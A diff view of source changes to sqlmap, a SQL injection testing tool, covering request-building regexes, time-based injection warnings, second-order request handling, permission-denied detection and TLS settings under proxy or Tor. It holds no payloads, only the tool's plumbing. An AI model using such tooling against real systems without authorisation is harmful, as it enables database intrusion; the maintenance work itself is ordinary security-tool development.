variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
|
||||||
|
|
||||||
|
if unsafeVariableNaming(variable) != variable:
|
||||||
|
value = variables[variable]
|
||||||
|
del variables[variable]
|
||||||
|
variables[unsafeVariableNaming(variable)] = value
|
||||||
|
|
||||||
uri = variables["uri"]
|
uri = variables["uri"]
|
||||||
|
|
||||||
for name, value in variables.items():
|
for name, value in variables.items():
|
||||||
@@ -1075,33 +1105,33 @@ class Connect(object):
|
|||||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||||
if re.search(r"<%s\b" % re.escape(name), post):
|
if re.search(r"<%s\b" % re.escape(name), post):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||||
if not found and re.search(regex, (post or "")):
|
if not found and re.search(regex, (post or "")):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
post = re.sub(regex, r"\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||||
if not found and re.search(regex, (post or "")):
|
if not found and re.search(regex, (post or "")):
|
||||||
found = True
|
found = True
|
||||||
post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
post = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||||
|
|
||||||
if re.search(regex, (get or "")):
|
if re.search(regex, (get or "")):
|
||||||
found = True
|
found = True
|
||||||
get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
get = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||||
|
|
||||||
if re.search(regex, (query or "")):
|
if re.search(regex, (query or "")):
|
||||||
found = True
|
found = True
|
||||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
uri = re.sub(regex.replace(r"\A", r"\?"), r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||||
|
|
||||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), re.escape(name), re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||||
if re.search(regex, (cookie or "")):
|
if re.search(regex, (cookie or "")):
|
||||||
found = True
|
found = True
|
||||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
cookie = re.sub(regex, r"\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||||
|
|
||||||
if not found:
|
if not found:
|
||||||
if post is not None:
|
if post is not None:
|
||||||
@@ -1117,7 +1147,7 @@ class Connect(object):
|
|||||||
if post is not None:
|
if post is not None:
|
||||||
if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
|
if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE):
|
||||||
post = getattr(post, UNENCODED_ORIGINAL_VALUE)
|
post = getattr(post, UNENCODED_ORIGINAL_VALUE)
|
||||||
elif kb.postUrlEncode:
|
elif postUrlEncode:
|
||||||
post = urlencode(post, spaceplus=kb.postSpaceToPlus)
|
post = urlencode(post, spaceplus=kb.postSpaceToPlus)
|
||||||
|
|
||||||
if timeBasedCompare and not conf.disableStats:
|
if timeBasedCompare and not conf.disableStats:
|
||||||
@@ -1128,11 +1158,11 @@ class Connect(object):
|
|||||||
|
|
||||||
if conf.tor:
|
if conf.tor:
|
||||||
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
warnMsg = "it's highly recommended to avoid usage of switch '--tor' for "
|
||||||
warnMsg += "time-based injections because of its high latency time"
|
warnMsg += "time-based injections because of inherent high latency time"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
warnMsg = "[%s] [WARNING] %stime-based comparison requires " % (time.strftime("%X"), "(case) " if kb.responseTimeMode else "")
|
||||||
warnMsg += "larger statistical model, please wait"
|
warnMsg += "%s statistical model, please wait" % ("larger" if len(kb.responseTimes) == 1 else "reset of")
|
||||||
dataToStdout(warnMsg)
|
dataToStdout(warnMsg)
|
||||||
|
|
||||||
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
while len(kb.responseTimes[kb.responseTimeMode]) < MIN_TIME_RESPONSES:
|
||||||
@@ -1205,8 +1235,10 @@ class Connect(object):
|
|||||||
warnMsg += "behavior in custom WAF/IPS/IDS solutions"
|
warnMsg += "behavior in custom WAF/IPS/IDS solutions"
|
||||||
singleTimeWarnMessage(warnMsg)
|
singleTimeWarnMessage(warnMsg)
|
||||||
|
|
||||||
if conf.secondOrder:
|
if conf.secondUrl:
|
||||||
page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
||||||
|
elif kb.secondReq:
|
||||||
|
page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
|
||||||
|
|
||||||
threadData.lastQueryDuration = calculateDeltaSeconds(start)
|
threadData.lastQueryDuration = calculateDeltaSeconds(start)
|
||||||
threadData.lastPage = page
|
threadData.lastPage = page
|
||||||
@@ -1227,7 +1259,11 @@ class Connect(object):
|
|||||||
page = removeReflectiveValues(page, payload)
|
page = removeReflectiveValues(page, payload)
|
||||||
|
|
||||||
kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
|
kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None
|
||||||
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
|
|
||||||
|
message = extractRegexResult(PERMISSION_DENIED_REGEX, page or "", re.I)
|
||||||
|
if message:
|
||||||
|
kb.permissionFlag = True
|
||||||
|
singleTimeWarnMessage("potential permission problems detected ('%s')" % message)
|
||||||
|
|
||||||
if content or response:
|
if content or response:
|
||||||
return page, headers, code
|
return page, headers, code
|
||||||
@@ -1237,5 +1273,5 @@ class Connect(object):
|
|||||||
else:
|
else:
|
||||||
return comparison(page, headers, code, getRatioValue, pageLength)
|
return comparison(page, headers, code, getRatioValue, pageLength)
|
||||||
|
|
||||||
def setHTTPHandlers(): # Cross-linked function
|
def setHTTPHandlers(): # Cross-referenced function
|
||||||
raise NotImplementedError
|
raise NotImplementedError
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import time
|
import time
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@@ -94,7 +94,7 @@ class DNSServer(object):
|
|||||||
|
|
||||||
with self._lock:
|
with self._lock:
|
||||||
for _ in self._requests:
|
for _ in self._requests:
|
||||||
if prefix is None and suffix is None or re.search("%s\..+\.%s" % (prefix, suffix), _, re.I):
|
if prefix is None and suffix is None or re.search(r"%s\..+\.%s" % (prefix, suffix), _, re.I):
|
||||||
retVal = _
|
retVal = _
|
||||||
self._requests.remove(_)
|
self._requests.remove(_)
|
||||||
break
|
break
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import distutils.version
|
import distutils.version
|
||||||
@@ -12,6 +12,7 @@ import socket
|
|||||||
import urllib2
|
import urllib2
|
||||||
|
|
||||||
from lib.core.common import getSafeExString
|
from lib.core.common import getSafeExString
|
||||||
|
from lib.core.data import conf
|
||||||
from lib.core.data import kb
|
from lib.core.data import kb
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
from lib.core.exception import SqlmapConnectionException
|
from lib.core.exception import SqlmapConnectionException
|
||||||
@@ -48,7 +49,7 @@ class HTTPSConnection(httplib.HTTPSConnection):
|
|||||||
|
|
||||||
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
# Reference(s): https://docs.python.org/2/library/ssl.html#ssl.SSLContext
|
||||||
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
# https://www.mnot.net/blog/2014/12/27/python_2_and_tls_sni
|
||||||
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) != False and hasattr(ssl, "SSLContext"):
|
if re.search(r"\A[\d.]+\Z", self.host) is None and kb.tlsSNI.get(self.host) is not False and not any((conf.proxy, conf.tor)) and hasattr(ssl, "SSLContext"):
|
||||||
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
for protocol in filter(lambda _: _ >= ssl.PROTOCOL_TLSv1, _protocols):
|
||||||
try:
|
try:
|
||||||
sock = create_sock()
|
sock = create_sock()
|
||||||
|
|||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user